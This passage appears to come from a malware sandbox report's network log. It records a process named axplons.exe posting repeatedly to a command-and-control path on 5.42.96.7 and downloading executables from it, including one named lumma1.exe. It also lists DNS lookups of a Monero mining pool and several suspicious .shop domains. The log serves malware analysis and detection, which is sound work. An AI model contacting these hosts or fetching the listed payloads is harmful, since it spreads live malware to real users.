                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:31 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 311296
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 20:05:37 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "663fcf91-4c000"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:34 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:40 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.7/lend/swizzhis.exe
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /lend/swizzhis.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:40 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 1084416
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 20:43:13 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "663fd861-108c00"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:44 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.7/lend/udated.exe
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /lend/udated.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:45 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 521728
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 20:13:13 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "663fd159-7f600"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:47 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.7/lend/lumma1.exe
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /lend/lumma1.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:47 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 1274880
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 20:48:32 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "663fd9a0-137400"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:50 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:45 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.7/lend/deat.exe
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /lend/deat.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:45 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 363520
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 21:47:52 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "663fe788-58c00"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:47 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  216.39.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  216.39.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  139.173.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  139.173.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  30.186.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  30.186.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  xmr.2miners.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  xmr.2miners.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  xmr.2miners.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  162.19.139.184
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  147.162.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  147.162.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  251.62.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  251.62.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  1.141.192.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  1.141.192.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  125.3.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  125.3.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  112.242.109.65.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  112.242.109.65.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  112.242.109.65.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  static11224210965clients your-serverde
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  yip.su
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  yip.su
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  yip.su
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.169.89
                                                                                                                                                                                                                                                                  yip.su
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.79.77
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  jonathantwo.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  jonathantwo.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  jonathantwo.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.31.124
                                                                                                                                                                                                                                                                  jonathantwo.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.176.131
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  192.182.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  192.182.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  228.128.172.185.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  228.128.172.185.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  westus2-2.in.applicationinsights.azure.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  westus2-2.in.applicationinsights.azure.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  westus2-2.in.applicationinsights.azure.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  westus2-2.in.ai.monitor.azure.com
                                                                                                                                                                                                                                                                  westus2-2.in.ai.monitor.azure.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  westus2-2.in.ai.privatelink.monitor.azure.com
                                                                                                                                                                                                                                                                  westus2-2.in.ai.privatelink.monitor.azure.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  gig-ai-prod-westus2-0.trafficmanager.net
                                                                                                                                                                                                                                                                  gig-ai-prod-westus2-0.trafficmanager.net
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  gig-ai-prod-wus2-01-app-v4-tag.westus2.cloudapp.azure.com
                                                                                                                                                                                                                                                                  gig-ai-prod-wus2-01-app-v4-tag.westus2.cloudapp.azure.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  20.9.155.148
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  156.59.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  156.59.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  plaintediousidowsko.shop
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  plaintediousidowsko.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  plaintediousidowsko.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.53.146
                                                                                                                                                                                                                                                                  plaintediousidowsko.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.213.139
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  holicisticscrarws.shop
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  holicisticscrarws.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  holicisticscrarws.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.183.72
                                                                                                                                                                                                                                                                  holicisticscrarws.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.40.92
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  47.151.221.77.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  47.151.221.77.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  78.96.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  78.96.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  lineagelasserytailsd.shop
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  lineagelasserytailsd.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  lineagelasserytailsd.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.62.251
                                                                                                                                                                                                                                                                  lineagelasserytailsd.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.141.60
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  s3-1-w.amazonaws.com
                                                                                                                                                                                                                                                                  s3-1-w.amazonaws.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  52.216.137.116
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  16.182.74.217
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  52.217.131.1
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  54.231.204.145
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  16.182.64.225
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  3.5.29.79
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  52.217.126.153
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  52.217.235.185
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  116.137.216.52.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  116.137.216.52.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  116.137.216.52.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  s3-1-w amazonawscom
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  123.48.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  123.48.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  steamcommunity.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  steamcommunity.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  steamcommunity.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.68.92.92
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  nexusrules.officeapps.live.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  nexusrules.officeapps.live.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  nexusrules.officeapps.live.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  prod.nexusrules.live.com.akadns.net
                                                                                                                                                                                                                                                                  prod.nexusrules.live.com.akadns.net
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  52.111.243.30
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  realdeepai.org
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  realdeepai.org
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  realdeepai.org
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.90.14
                                                                                                                                                                                                                                                                  realdeepai.org
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.193.79
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  89.169.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
